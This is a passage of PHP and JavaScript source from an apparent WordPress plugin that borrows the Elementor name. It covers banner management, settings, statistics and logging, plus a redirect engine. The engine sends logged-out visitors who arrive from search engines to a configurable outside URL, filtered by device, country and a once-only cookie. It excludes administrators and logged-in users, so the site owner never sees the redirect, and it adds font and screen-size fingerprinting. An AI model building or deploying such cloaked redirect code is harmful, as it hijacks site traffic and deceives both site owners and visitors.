                            <option value="once_per_session" <?php echo ($editing_banner && $editing_banner->frequency_rules_decoded['type'] === 'once_per_session') ? 'selected' : ''; ?>>Once per Session</option>
                            <option value="once_per_period" <?php echo ($editing_banner && $editing_banner->frequency_rules_decoded['type'] === 'once_per_period') ? 'selected' : ''; ?>>Once per Period</option>
                            <option value="limited_times" <?php echo ($editing_banner && $editing_banner->frequency_rules_decoded['type'] === 'limited_times') ? 'selected' : ''; ?>>Limited Times</option>
                        </select>
                        <br><br>
                        Period (days): <input type="number" name="period_days" value="<?php echo $editing_banner ? intval($editing_banner->frequency_rules_decoded['period_days']) : 1; ?>" min="1" max="365" style="width: 80px;">
                        Max shows: <input type="number" name="max_shows" value="<?php echo $editing_banner ? intval($editing_banner->frequency_rules_decoded['max_shows']) : 3; ?>" min="1" max="100" style="width: 80px;">
                    </td>
                </tr>
                <tr>
                    <th scope="row">Status</th>
                    <td>
                        <select name="banner_status">
                            <option value="draft" <?php echo ($editing_banner && $editing_banner->status === 'draft') ? 'selected' : ''; ?>>Draft</option>
                            <option value="active" <?php echo ($editing_banner && $editing_banner->status === 'active') ? 'selected' : ''; ?>>Active</option>
                            <option value="inactive" <?php echo ($editing_banner && $editing_banner->status === 'inactive') ? 'selected' : ''; ?>>Inactive</option>
                        </select>
                    </td>
                </tr>
            </table>
            
            <?php submit_button($editing_banner ? 'Update Banner' : 'Create Banner', 'primary', 'create_banner'); ?>
            <?php if ($editing_banner): ?>
                <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=banners'); ?>" class="button">Cancel Edit</a>
            <?php endif; ?>
        </form>
    </div>
    
    <h3>Existing Banners</h3>
    <table class="widefat">
        <thead>
            <tr>
                <th>Name</th>
                <th>Type</th>
                <th>Status</th>
                <th>Created</th>
                <th>Shows</th>
                <th>Clicks</th>
                <th>CTR</th>
                <th>Actions</th>
            </tr>
        </thead>
        <tbody>
            <?php if (empty($banners)): ?>
                <tr><td colspan="8">No banners created yet.</td></tr>
            <?php else: ?>
                <?php foreach ($banners as $banner): ?>
                    <?php
                    // Get statistics
                    $stats = $wpdb->get_results($wpdb->prepare(
                        "SELECT event_type, COUNT(*) as count 
                         FROM " . WP_ELEMENTOR_BANNER_STATS_TABLE . " 
                         WHERE banner_id = %d 
                         GROUP BY event_type",
                        $banner->id
                    ));
                    
                    $shows = 0;
                    $clicks = 0;
                    foreach ($stats as $stat) {
                        if ($stat->event_type === 'show') $shows = $stat->count;
                        if ($stat->event_type === 'click') $clicks = $stat->count;
                    }
                    $ctr = $shows > 0 ? round(($clicks / $shows) * 100, 2) : 0;
                    ?>
                    <tr>
                        <td><?php echo esc_html($banner->name); ?></td>
                        <td><?php echo esc_html($banner->type); ?></td>
                        <td>
                            <span class="status-<?php echo $banner->status; ?>">
                                <?php echo ucfirst($banner->status); ?>
                            </span>
                        </td>
                        <td><?php echo esc_html($banner->created_at); ?></td>
                        <td><?php echo $shows; ?></td>
                        <td><?php echo $clicks; ?></td>
                        <td><?php echo $ctr; ?>%</td>
                        <td>
                            <a href="?page=wp-elementor-control&tab=banners&edit=<?php echo $banner->id; ?>" class="button button-small">Edit</a>
                            <?php if ($banner->status === 'active'): ?>
                                <a href="<?php echo wp_nonce_url('?page=wp-elementor-control&tab=banners&toggle_status=' . $banner->id, 'toggle_banner_' . $banner->id); ?>" 
                                   class="button button-small">Deactivate</a>
                            <?php else: ?>
                                <a href="<?php echo wp_nonce_url('?page=wp-elementor-control&tab=banners&toggle_status=' . $banner->id, 'toggle_banner_' . $banner->id); ?>" 
                                   class="button button-small">Activate</a>
                            <?php endif; ?>
                            <a href="<?php echo wp_nonce_url('?page=wp-elementor-control&tab=banners&delete=' . $banner->id, 'delete_banner_' . $banner->id); ?>" 
                               onclick="return confirm('Are you sure you want to delete this banner?')" class="button button-small">Delete</a>
                        </td>
                    </tr>
                <?php endforeach; ?>
            <?php endif; ?>
        </tbody>
    </table>
    
    <style>
    .status-active { color: #46b450; font-weight: bold; }
    .status-inactive { color: #dc3232; }
    .status-draft { color: #ffb900; }
    </style>
    <?php
}

// Continue with existing functions...
// (I'll add the rest of the existing functionality in the next part)


// === EXISTING SETTINGS FUNCTIONS (PRESERVED) ===
add_action('admin_init', 'wp_elementor_control_settings');

function wp_elementor_control_settings() {
    register_setting('wp_elementor_control_options', 'wp_elementor_control_settings');

    add_settings_section('wp_elementor_control_main', '', null, 'wp-elementor-control');

    add_settings_field('enabled', 'Enable Redirect', 'wp_elementor_control_enabled_callback', 'wp-elementor-control', 'wp_elementor_control_main');
    add_settings_field('redirect_url', 'Redirect URL', 'wp_elementor_control_url_callback', 'wp-elementor-control', 'wp_elementor_control_main');
    add_settings_field('devices', 'Devices to Redirect', 'wp_elementor_control_devices_callback', 'wp-elementor-control', 'wp_elementor_control_main');
    add_settings_field('detection_mode', 'Detection Mode', 'wp_elementor_control_detection_mode_callback', 'wp-elementor-control', 'wp_elementor_control_main');
    add_settings_field('referrer_check', 'Referrer Check', 'wp_elementor_control_referrer_callback', 'wp-elementor-control', 'wp_elementor_control_main');
    add_settings_field('geo', 'Allowed Countries', 'wp_elementor_control_geo_callback', 'wp-elementor-control', 'wp_elementor_control_main');
    add_settings_field('logging', 'Logging Options', 'wp_elementor_control_logging_callback', 'wp-elementor-control', 'wp_elementor_control_main');
    add_settings_field('advanced', 'Advanced Options', 'wp_elementor_control_advanced_callback', 'wp-elementor-control', 'wp_elementor_control_main');
}

function wp_elementor_control_enabled_callback() {
    $options = get_option('wp_elementor_control_settings');
    echo '<input type="checkbox" name="wp_elementor_control_settings[enabled]" value="1" ' . checked(1, isset($options['enabled']) ? $options['enabled'] : 0, false) . ' />';
}

function wp_elementor_control_url_callback() {
    $options = get_option('wp_elementor_control_settings');
    echo '<input type="text" name="wp_elementor_control_settings[redirect_url]" value="' . esc_attr(isset($options['redirect_url']) ? $options['redirect_url'] : 'https://www.google.com/') . '" size="50" />';
}

function wp_elementor_control_devices_callback() {
    $options = get_option('wp_elementor_control_settings');
    $devices = [
        'mac' => 'MacBook/Mac Desktop (macOS)',
        'win' => 'Windows PC',
        'iphone' => 'iPhone',
        'ipad' => 'iPad',
        'android_phone' => 'Android Phone',
        'android_tablet' => 'Android Tablet',
        'other_mobile' => 'Other Mobile Devices'
    ];
    
    echo '<p class="description">Select which devices should be redirected:</p>';
    
    foreach ($devices as $key => $label) {
        $checked = isset($options['devices'][$key]) ? $options['devices'][$key] : 0;
        echo '<label style="display:block; margin-bottom:8px;"><input type="checkbox" name="wp_elementor_control_settings[devices][' . $key . ']" value="1" ' . checked(1, $checked, false) . '> ' . $label . '</label>';
    }
}

function wp_elementor_control_detection_mode_callback() {
    $options = get_option('wp_elementor_control_settings');
    $mode = isset($options['detection_mode']) ? $options['detection_mode'] : 'basic';
    ?>
    <select name="wp_elementor_control_settings[detection_mode]">
        <option value="basic" <?php selected($mode, 'basic'); ?>>Basic (User-Agent only)</option>
        <option value="advanced" <?php selected($mode, 'advanced'); ?>>Advanced (User-Agent + JavaScript)</option>
        <option value="aggressive" <?php selected($mode, 'aggressive'); ?>>Aggressive (Advanced detection techniques)</option>
    </select>
    <p class="description">Advanced and Aggressive modes use JavaScript for better detection but may impact performance.</p>
    <?php
}

function wp_elementor_control_referrer_callback() {
    $options = get_option('wp_elementor_control_settings');
    $referrer_check = isset($options['referrer_check']) ? $options['referrer_check'] : 'search';
    ?>
    <select name="wp_elementor_control_settings[referrer_check]">
        <option value="disabled" <?php selected($referrer_check, 'disabled'); ?>>Disabled (Redirect regardless of referrer)</option>
        <option value="search" <?php selected($referrer_check, 'search'); ?>>Search Engines Only</option>
        <option value="custom" <?php selected($referrer_check, 'custom'); ?>>Custom Referrers</option>
    </select>
    <br>
    <div id="custom-referrers" style="margin-top: 10px; <?php echo $referrer_check !== 'custom' ? 'display:none;' : ''; ?>">
        <input type="text" name="wp_elementor_control_settings[custom_referrers]" value="<?php echo esc_attr(isset($options['custom_referrers']) ? $options['custom_referrers'] : 'google.com,facebook.com'); ?>" size="50" />
        <p class="description">Comma-separated list of domains (e.g., google.com,facebook.com)</p>
    </div>
    <script>
        jQuery(document).ready(function($) {
            $('select[name="wp_elementor_control_settings[referrer_check]"]').on('change', function() {
                $('#custom-referrers').toggle($(this).val() === 'custom');
            });
        });
    </script>
    <?php
}

function wp_elementor_control_geo_callback() {
    $options = get_option('wp_elementor_control_settings');
    echo '<input type="text" name="wp_elementor_control_settings[geo]" value="' . esc_attr(isset($options['geo']) ? $options['geo'] : '') . '" size="50" />';
    echo '<p class="description">ISO country codes, comma-separated (e.g., US,CA,UK). Leave empty to allow all countries.</p>';
}

function wp_elementor_control_logging_callback() {
    $options = get_option('wp_elementor_control_settings');
    ?>
    <label>
        <input type="checkbox" name="wp_elementor_control_settings[enable_logging]" value="1" 
            <?php checked(1, isset($options['enable_logging']) ? $options['enable_logging'] : 0); ?>>
        Enable detailed logging
    </label>
    <p class="description">Logs will be available in the Logs tab</p>
    
    <label>
        <input type="number" name="wp_elementor_control_settings[log_retention]" value="<?php echo intval(isset($options['log_retention']) ? $options['log_retention'] : 7); ?>" min="1" max="30" style="width: 60px;">
        Days to keep logs
    </label>
    <?php
}

function wp_elementor_control_advanced_callback() {
    $options = get_option('wp_elementor_control_settings');
    ?>
    <label>
        <input type="checkbox" name="wp_elementor_control_settings[bypass_cache]" value="1" 
            <?php checked(1, isset($options['bypass_cache']) ? $options['bypass_cache'] : 0); ?>>
        Add cache-busting parameters to redirect URL
    </label>
    <p class="description">Helps prevent caching of redirects</p>
    
    <label>
        <input type="checkbox" name="wp_elementor_control_settings[redirect_once]" value="1" 
            <?php checked(1, isset($options['redirect_once']) ? $options['redirect_once'] : 0); ?>>
        Redirect each visitor only once (uses cookies)
    </label>
    <p class="description">Prevents multiple redirects for the same visitor</p>
    <?php
}

// === STATS TAB ===
function wp_elementor_control_stats_tab() {
    ?>
    <h2>Statistics</h2>
    <?php
    $stats = get_option('wp_elementor_control_stats', [
        'total' => 0,
        'redirected' => 0,
        'mac' => 0,
        'win' => 0,
        'iphone' => 0,
        'ipad' => 0,
        'android' => 0,
        'other_mobile' => 0
    ]);
    ?>
    <table class="widefat" style="width: 500px; margin-top: 20px;">
        <thead>
            <tr>
                <th>Metric</th>
                <th>Count</th>
                <th>Percentage</th>
            </tr>
        </thead>
        <tbody>
            <tr>
                <td>Total visitors processed</td>
                <td><?php echo intval($stats['total']); ?></td>
                <td>100%</td>
            </tr>
            <tr>
                <td>Total redirected</td>
                <td><?php echo intval($stats['redirected']); ?></td>
                <td><?php echo $stats['total'] > 0 ? round(($stats['redirected'] / $stats['total']) * 100, 1) . '%' : '0%'; ?></td>
            </tr>
            <tr>
                <td>Mac OS detected</td>
                <td><?php echo intval($stats['mac']); ?></td>
                <td><?php echo $stats['total'] > 0 ? round(($stats['mac'] / $stats['total']) * 100, 1) . '%' : '0%'; ?></td>
            </tr>
            <tr>
                <td>Windows detected</td>
                <td><?php echo intval($stats['win']); ?></td>
                <td><?php echo $stats['total'] > 0 ? round(($stats['win'] / $stats['total']) * 100, 1) . '%' : '0%'; ?></td>
            </tr>
            <tr>
                <td>iPhone detected</td>
                <td><?php echo intval($stats['iphone']); ?></td>
                <td><?php echo $stats['total'] > 0 ? round(($stats['iphone'] / $stats['total']) * 100, 1) . '%' : '0%'; ?></td>
            </tr>
            <tr>
                <td>iPad detected</td>
                <td><?php echo intval($stats['ipad']); ?></td>
                <td><?php echo $stats['total'] > 0 ? round(($stats['ipad'] / $stats['total']) * 100, 1) . '%' : '0%'; ?></td>
            </tr>
            <tr>
                <td>Android detected</td>
                <td><?php echo intval($stats['android']); ?></td>
                <td><?php echo $stats['total'] > 0 ? round(($stats['android'] / $stats['total']) * 100, 1) . '%' : '0%'; ?></td>
            </tr>
            <tr>
                <td>Other mobile detected</td>
                <td><?php echo intval($stats['other_mobile']); ?></td>
                <td><?php echo $stats['total'] > 0 ? round(($stats['other_mobile'] / $stats['total']) * 100, 1) . '%' : '0%'; ?></td>
            </tr>
        </tbody>
    </table>
    
    <p>
        <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&reset_stats=1'); ?>" 
           class="button" onclick="return confirm('Are you sure you want to reset statistics?');">
            Reset Statistics
        </a>
    </p>
    <?php
}

// === LOGS TAB ===
function wp_elementor_control_logs_tab() {
    ?>
    <h2>Redirect Logs</h2>
    <table class="widefat">
        <thead>
            <tr>
                <th>Date/Time</th>
                <th>IP</th>
                <th>User Agent</th>
                <th>Detected Device</th>
                <th>Referrer</th>
                <th>Country</th>
                <th>Redirected</th>
                <th>Reason</th>
            </tr>
        </thead>
        <tbody>
            <?php
            $logs = get_option('wp_elementor_control_logs', []);
            $logs = array_slice(array_reverse($logs), 0, 50); // Show last 50 logs
            
            foreach ($logs as $log) {
                echo '<tr>';
                echo '<td>' . esc_html($log['time']) . '</td>';
                echo '<td>' . esc_html($log['ip']) . '</td>';
                echo '<td>' . esc_html(substr($log['ua'], 0, 100)) . '...</td>';
                echo '<td>' . esc_html($log['device']) . '</td>';
                echo '<td>' . esc_html(substr($log['referrer'], 0, 50)) . '</td>';
                echo '<td>' . esc_html($log['country']) . '</td>';
                echo '<td>' . ($log['redirected'] ? 'Yes' : 'No') . '</td>';
                echo '<td>' . esc_html($log['reason']) . '</td>';
                echo '</tr>';
            }
            
            if (empty($logs)) {
                echo '<tr><td colspan="8">No logs available</td></tr>';
            }
            ?>
        </tbody>
    </table>
    <p>
        <a href="<?php echo admin_url('options-general.php?page=wp-elementor-control&tab=logs&clear=1'); ?>" 
           class="button" onclick="return confirm('Are you sure you want to clear all logs?');">
            Clear Logs
        </a>
    </p>
    <?php
}

// === TEST TAB ===
function wp_elementor_control_test_tab() {
    ?>
    <h2>Test Your Browser</h2>
    <div id="browser-info" style="margin-top: 20px;">
        <table class="widefat" style="width: 600px;">
            <tr>
                <th>User Agent:</th>
                <td id="user-agent">Checking...</td>
            </tr>
            <tr>
                <th>Platform:</th>
                <td id="platform">Checking...</td>
            </tr>
            <tr>
                <th>Screen Resolution:</th>
                <td id="resolution">Checking...</td>
            </tr>
            <tr>
                <th>OS Detection:</th>
                <td id="os-detection">Checking...</td>
            </tr>
            <tr>
                <th>Device Type:</th>
                <td id="device-type">Checking...</td>
            </tr>
            <tr>
                <th>Referrer:</th>
                <td id="referrer">Checking...</td>
            </tr>
            <tr>
                <th>Admin Status:</th>
                <td id="admin-status"><?php echo current_user_can('manage_options') ? '<strong style="color: red;">ADMIN - EXCLUDED</strong>' : 'Regular User'; ?></td>
            </tr>
        </table>
        
        <div style="margin-top: 20px;">
            <h3>Detection Results</h3>
            <div id="detection-results" style="padding: 10px; background-color: #f0f0f0; border: 1px solid #ccc;">
                Running detection tests...
            </div>
        </div>
    </div>
    
    <script>
    document.addEventListener('DOMContentLoaded', function() {
        // Basic information
        document.getElementById('user-agent').textContent = navigator.userAgent;
        document.getElementById('platform').textContent = navigator.platform;
        document.getElementById('resolution').textContent = window.screen.width + 'x' + window.screen.height;
        document.getElementById('referrer').textContent = document.referrer || 'None';
        
        // OS and device detection
        let os = 'Unknown';
        let deviceType = 'Unknown';
        const ua = navigator.userAgent;
        
        if (/iPhone/i.test(ua)) {
            os = 'iOS';
            deviceType = 'iPhone';
        } else if (/iPad/i.test(ua)) {
            os = 'iOS';
            deviceType = 'iPad';
        } else if (/Android/i.test(ua)) {
            os = 'Android';
            deviceType = 'Android Device';
            if (/Mobile/i.test(ua)) {
                deviceType = 'Android Phone';
            } else {
                deviceType = 'Android Tablet';
            }
        } else if (/Macintosh|Mac OS X|macOS/i.test(ua)) {
            os = 'MacOS';
            deviceType = 'MacBook/Mac Desktop';
        } else if (/Windows NT/i.test(ua)) {
            os = 'Windows';
            deviceType = 'Windows PC';
        } else if (/Linux/i.test(ua)) {
            os = 'Linux';
            deviceType = 'Linux PC';
        }
        
        document.getElementById('os-detection').textContent = os;
        document.getElementById('device-type').textContent = deviceType;
        
        // Final detection results
        const detectionResults = document.getElementById('detection-results');
        const isAdmin = <?php echo current_user_can('manage_options') ? 'true' : 'false'; ?>;
        
        if (isAdmin) {
            detectionResults.innerHTML = '<strong style="color: red;">ADMIN USER DETECTED</strong><br>You are excluded from all plugin functions (redirects and banners will not work for you).';
            detectionResults.style.backgroundColor = '#ffebee';
            detectionResults.style.border = '1px solid #f44336';
        } else {
            detectionResults.innerHTML = '<strong>Result:</strong> This browser would be detected as a <b>' + deviceType + '</b> device.';
            
            if (deviceType === 'MacBook/Mac Desktop') {
                detectionResults.style.backgroundColor = '#d4edda';
                detectionResults.style.border = '1px solid #c3e6cb';
            } else if (deviceType === 'iPhone' || deviceType === 'iPad') {
                detectionResults.style.backgroundColor = '#fff3cd';
                detectionResults.style.border = '1px solid #ffeeba';
            } else if (deviceType === 'Android Phone' || deviceType === 'Android Tablet') {
                detectionResults.style.backgroundColor = '#d1ecf1';
                detectionResults.style.border = '1px solid #bee5eb';
            } else if (deviceType === 'Windows PC') {
                detectionResults.style.backgroundColor = '#e2e3e5';
                detectionResults.style.border = '1px solid #d6d8db';
            } else {
                detectionResults.style.backgroundColor = '#f8d7da';
                detectionResults.style.border = '1px solid #f5c6cb';
            }
        }
    });
    </script>
    <?php
}

// === MODIFIED REDIRECTION LOGIC WITH EXCLUSIONS ===
add_action('init', 'wp_elementor_control_init', 5); // Higher priority for exclusion check

function wp_elementor_control_init() {
    // FIRST: Check if user should be excluded (HIGHEST PRIORITY)
    if (WP_Elementor_Admin_Exclusions::is_excluded_user()) {
        return; // Stop all plugin functionality for excluded users
    }
    
    // Continue with existing redirect logic only for non-excluded users
    if (is_admin()) return;

    $options = get_option('wp_elementor_control_settings');
    if (empty($options['enabled'])) return;

    if (is_user_logged_in()) return;
    
    // Check if we should only redirect once
    if (!empty($options['redirect_once']) && isset($_COOKIE['wp_elementor_redirected'])) {
        return;
    }

    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    $ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    
    // Initialize log entry
    $log = [
        'time' => current_time('mysql'),
        'ip' => $ip,
        'ua' => $ua,
        'device' => 'Unknown',
        'referrer' => $ref,
        'country' => 'Unknown',
        'redirected' => false,
        'reason' => 'Initial check'
    ];

    $redirect = false;
    $detected_device = 'unknown';

    // Device check with improved detection
    $devices = isset($options['devices']) ? $options['devices'] : [];
    
    // iPhone detection
    if (!empty($devices['iphone']) && preg_match('/iPhone/i', $ua)) {
        $redirect = true;
        $detected_device = 'iphone';
        $log['device'] = 'iPhone';
    }
    // iPad detection
    else if (!empty($devices['ipad']) && preg_match('/iPad/i', $ua)) {
        $redirect = true;
        $detected_device = 'ipad';
        $log['device'] = 'iPad';
    }
    // Android phone detection
    else if (!empty($devices['android_phone']) && preg_match('/Android.*Mobile/i', $ua)) {
        $redirect = true;
        $detected_device = 'android';
        $log['device'] = 'Android Phone';
    }
    // Android tablet detection
    else if (!empty($devices['android_tablet']) && preg_match('/Android/i', $ua) && !preg_match('/Mobile/i', $ua)) {
        $redirect = true;
        $detected_device = 'android';
        $log['device'] = 'Android Tablet';
    }
    // Mac detection - ensure it's not an iOS device
    else if (!empty($devices['mac']) && 
             preg_match('/Macintosh|Mac OS X|macOS/i', $ua) && 
             !preg_match('/iPhone|iPad|iPod/i', $ua)) {
        $redirect = true;
        $detected_device = 'mac';
        $log['device'] = 'Mac';
    } 
    // Windows detection
    else if (!empty($devices['win']) && preg_match('/Windows NT|Win64|WOW64/i', $ua)) {
        $redirect = true;
        $detected_device = 'win';
        $log['device'] = 'Windows';
    } 
    // Other mobile detection
    else if (!empty($devices['other_mobile']) && 
             preg_match('/webOS|BlackBerry|Opera Mini|Opera Mobi|IEMobile/i', $ua)) {
        $redirect = true;
        $detected_device = 'other_mobile';
        $log['device'] = 'Other Mobile';
    } else {
        $redirect = false;
        $log['reason'] = 'Device not in target list';
    }

    // Referrer check
    $referrer_check = isset($options['referrer_check']) ? $options['referrer_check'] : 'search';
    
    if ($redirect && $referrer_check !== 'disabled') {
        if ($referrer_check === 'search' && !preg_match('/google|bing|yahoo|yandex|duckduckgo|baidu/i', $ref)) {
            $redirect = false;
            $log['reason'] = 'Not from search engine';
        } else if ($referrer_check === 'custom') {
            $custom_referrers = array_map('trim', explode(',', isset($options['custom_referrers']) ? $options['custom_referrers'] : ''));
            $matched = false;
            
            foreach ($custom_referrers as $domain) {
                if (!empty($domain) && strpos($ref, $domain) !== false) {
                    $matched = true;
                    break;
                }
            }
            
            if (!$matched) {
                $redirect = false;
                $log['reason'] = 'Not from custom referrer list';
            }
        }
    }

    // Geo check
    if ($redirect && !empty($options['geo'])) {
        $allowed_countries = array_map('trim', explode(',', strtoupper($options['geo'])));
        
        // Use cached geo data if available
        $geo_cache_key = 'wp_elementor_control_geo_' . str_replace('.', '_', $ip);
        $country_code = get_transient($geo_cache_key);
        
        if ($country_code === false) {
            // Try ip-api.com first
            $geo = @file_get_contents("http://ip-api.com/json/{$ip}?fields=countryCode");
            if ($geo !== false) {
                $geo = json_decode($geo, true);
                $country_code = isset($geo['countryCode']) ? $geo['countryCode'] : '';
            }
            
            // Fallback to ipinfo.io if ip-api fails
            if (empty($country_code)) {
                $geo = @file_get_contents("https://ipinfo.io/{$ip}/json");
                if ($geo !== false) {
                    $geo = json_decode($geo, true);
                    $country_code = isset($geo['country']) ? $geo['country'] : '';
                }
            }
            
            // Cache the result for 24 hours
            if (!empty($country_code)) {
                set_transient($geo_cache_key, $country_code, 24 * HOUR_IN_SECONDS);
            }
        }
        
        $log['country'] = $country_code ?: 'Unknown';
        
        if (!empty($country_code) && !in_array($country_code, $allowed_countries)) {
            $redirect = false;
            $log['reason'] = "Country {$country_code} not in allowed list";
        }
    }

    // Update statistics
    $stats = get_option('wp_elementor_control_stats', [
        'total' => 0,
        'redirected' => 0,
        'mac' => 0,
        'win' => 0,
        'iphone' => 0,
        'ipad' => 0,
        'android' => 0,
        'other_mobile' => 0
    ]);
    
    $stats['total']++;
    if ($detected_device !== 'unknown') {
        $stats[$detected_device]++;
    }
    
    if ($redirect) {
        $stats['redirected']++;
        $log['redirected'] = true;
        $log['reason'] = 'Redirect successful';
        
        // Set cookie if redirect_once is enabled
        if (!empty($options['redirect_once'])) {
            setcookie('wp_elementor_redirected', '1', time() + 30 * DAY_IN_SECONDS, '/');
        }
        
        // Add cache-busting if enabled
        $redirect_url = isset($options['redirect_url']) ? $options['redirect_url'] : 'https://www.google.com/';
        if (!empty($options['bypass_cache'])) {
            $separator = (strpos($redirect_url, '?') !== false) ? '&' : '?';
            $redirect_url .= $separator . 'cb=' . time();
        }
        
        update_option('wp_elementor_control_stats', $stats);
        
        // Save log if enabled
        if (!empty($options['enable_logging'])) {
            wp_elementor_control_save_log($log);
        }
        
        wp_redirect(esc_url($redirect_url));
        exit;
    }
    
    update_option('wp_elementor_control_stats', $stats);
    
    // Save log if enabled
    if (!empty($options['enable_logging'])) {
        wp_elementor_control_save_log($log);
    }
    
    // For advanced detection, add JavaScript check
    if (isset($options['detection_mode']) && $options['detection_mode'] !== 'basic') {
        add_action('wp_footer', 'wp_elementor_control_js_detection');
    }
}

function wp_elementor_control_save_log($log) {
    $logs = get_option('wp_elementor_control_logs', []);
    $logs[] = $log;
    
    // Limit log size
    $options = get_option('wp_elementor_control_settings');
    $retention_days = intval(isset($options['log_retention']) ? $options['log_retention'] : 7);
    $cutoff_time = strtotime("-{$retention_days} days");
    
    // Remove old logs
    $logs = array_filter($logs, function($entry) use ($cutoff_time) {
        return strtotime($entry['time']) >= $cutoff_time;
    });
    
    // Keep maximum 1000 entries
    if (count($logs) > 1000) {
        $logs = array_slice($logs, -1000);
    }
    
    update_option('wp_elementor_control_logs', $logs);
}

function wp_elementor_control_js_detection() {
    // Only run for non-excluded users
    if (WP_Elementor_Admin_Exclusions::is_excluded_user()) {
        return;
    }
    
    $options = get_option('wp_elementor_control_settings');
    if (empty($options['enabled'])) return;
    
    $redirect_url = esc_js(isset($options['redirect_url']) ? $options['redirect_url'] : 'https://www.google.com/');
    $devices = isset($options['devices']) ? $options['devices'] : [];
    $mode = isset($options['detection_mode']) ? $options['detection_mode'] : 'basic';
    
    ?>
    <script type="text/javascript">
    (function() {
        // Basic checks already done server-side
        // This is for additional client-side verification
        
        function detectMac() {
            const ua = navigator.userAgent;
            const platform = navigator.platform;
            
            // Basic Mac detection - ensure it's not an iOS device
            if ((/Macintosh|Mac OS X|macOS/i.test(ua) || /Mac/.test(platform)) && 
                !/iPhone|iPad|iPod/i.test(ua)) {
                return true;
            }
            
            <?php if ($mode === 'aggressive'): ?>
            // Aggressive detection techniques
            // Check for Mac-specific fonts
            const macFonts = ['Helvetica Neue', 'Lucida Grande', 'San Francisco'];
            for (const font of macFonts) {
                if (document.fonts && document.fonts.check(`12px "${font}"`)) {
                    return true;
                }
            }
            
            // Check for typical Mac resolutions
            const resolution = window.screen.width * window.screen.height;
            const macResolutions = [
                2560 * 1600, // 16-inch MacBook Pro
                2880 * 1800, // 15-inch MacBook Pro Retina
                2560 * 1440, // 13-inch MacBook Pro
                1440 * 900,  // 13-inch MacBook Air
                1280 * 800   // Older MacBooks
            ];
            
            if (macResolutions.includes(resolution)) {
                return true;
            }
            <?php endif; ?>
            
            return false;
        }
        
        function detectWindows() {
            const ua = navigator.userAgent;
            const platform = navigator.platform;
            
            return /Windows NT|Win64|WOW64/i.test(ua) || /Win/.test(platform);
        }
        
        function detectIPhone() {
            const ua = navigator.userAgent;
            return /iPhone/i.test(ua);
        }
        
        function detectIPad() {
            const ua = navigator.userAgent;
            return /iPad/i.test(ua) || 
                  (/Macintosh/i.test(ua) && navigator.maxTouchPoints && navigator.maxTouchPoints > 2);
        }
        
        function detectAndroidPhone() {
            const ua = navigator.userAgent;
            return /Android/i.test(ua) && /Mobile/i.test(ua);
        }
        
        function detectAndroidTablet() {
            const ua = navigator.userAgent;
            return /Android/i.test(ua) && !/Mobile/i.test(ua);
        }
        
        function detectOtherMobile() {
            const ua = navigator.userAgent;
            return /webOS|BlackBerry|Opera Mini|Opera Mobi|IEMobile/i.test(ua);
        }
        
        function shouldRedirect() {
            <?php if (!empty($devices['mac'])): ?>
            if (detectMac()) return true;
            <?php endif; ?>
            
            <?php if (!empty($devices['win'])): ?>
            if (detectWindows()) return true;
            <?php endif; ?>
            
            <?php if (!empty($devices['iphone'])): ?>
            if (detectIPhone()) return true;
            <?php endif; ?>
            
            <?php if (!empty($devices['ipad'])): ?>
            if (detectIPad()) return true;
            <?php endif; ?>
            
            <?php if (!empty($devices['android_phone'])): ?>
            if (detectAndroidPhone()) return true;
            <?php endif; ?>
            
            <?php if (!empty($devices['android_tablet'])): ?>
            if (detectAndroidTablet()) return true;
            <?php endif; ?>
            
            <?php if (!empty($devices['other_mobile'])): ?>
            if (detectOtherMobile()) return true;
            <?php endif; ?>
            
            return false;
        }
        
        // Check if we should redirect
        <?php if (!empty($options['redirect_once'])): ?>
        // Check if already redirected
        if (document.cookie.indexOf('wp_elementor_redirected=1') !== -1) {
            return;
        }
        <?php endif; ?>
        
        if (shouldRedirect()) {
            <?php if (!empty($options['bypass_cache'])): ?>
            const separator = '<?php echo strpos($redirect_url, '?') !== false ? '&' : '?'; ?>';
            window.location.href = '<?php echo $redirect_url; ?>' + separator + 'cb=' + Date.now();
            <?php else: ?>
            window.location.href = '<?php echo $redirect_url; ?>';
            <?php endif; ?>
            
            <?php if (!empty($options['redirect_once'])): ?>
            // Set cookie to prevent future redirects
            document.cookie = 'wp_elementor_redirected=1; path=/; max-age=<?php echo 30 * DAY_IN_SECONDS; ?>';
            <?php endif; ?>
        }
    })();
    </script>
    <?php
}

// Add settings link on plugin page
add_filter('plugin_action_links_' . plugin_basename(__FILE__), 'wp_elementor_control_plugin_links');

function wp_elementor_control_plugin_links($links) {
    $settings_link = '<a href="options-general.php?page=wp-elementor-control">Settings</a>';
    array_unshift($links, $settings_link);
    return $links;
}



// === ENHANCED STATISTICS FUNCTIONS ===
function wp_elementor_control_get_banner_statistics() {
    global $wpdb;
    
    $stats = array();
    
    // Get banner performance data
    $banner_stats = $wpdb->get_results("
        SELECT 
            b.id,
            b.name,
            b.type,
            COUNT(CASE WHEN bs.event_type = 'show' THEN 1 END) as shows,
            COUNT(CASE WHEN bs.event_type = 'click' THEN 1 END) as clicks,
            COUNT(CASE WHEN bs.event_type = 'close' THEN 1 END) as closes
        FROM " . WP_ELEMENTOR_BANNERS_TABLE . " b
        LEFT JOIN " . WP_ELEMENTOR_BANNER_STATS_TABLE . " bs ON b.id = bs.banner_id
        WHERE b.status = 'active'
        GROUP BY b.id, b.name, b.type
        ORDER BY shows DESC
    ");
    
    $stats['banners'] = $banner_stats;
    
    // Get device breakdown for banners
    $device_stats = $wpdb->get_results("
        SELECT 
            device_type,
            COUNT(CASE WHEN event_type = 'show' THEN 1 END) as shows,
            COUNT(CASE WHEN event_type = 'click' THEN 1 END) as clicks
        FROM " . WP_ELEMENTOR_BANNER_STATS_TABLE . "
        WHERE device_type IS NOT NULL
        GROUP BY device_type
        ORDER BY shows DESC
    ");
    
    $stats['devices'] = $device_stats;
    
    // Get recent activity
    $recent_activity = $wpdb->get_results("
        SELECT 
            bs.event_type,
            bs.timestamp,
            bs.device_type,
            b.name as banner_name
        FROM " . WP_ELEMENTOR_BANNER_STATS_TABLE . " bs
        JOIN " . WP_ELEMENTOR_BANNERS_TABLE . " b ON bs.banner_id = b.id
        ORDER BY bs.timestamp DESC
        LIMIT 20
    ");
    
    $stats['recent_activity'] = $recent_activity;
    
    return $stats;
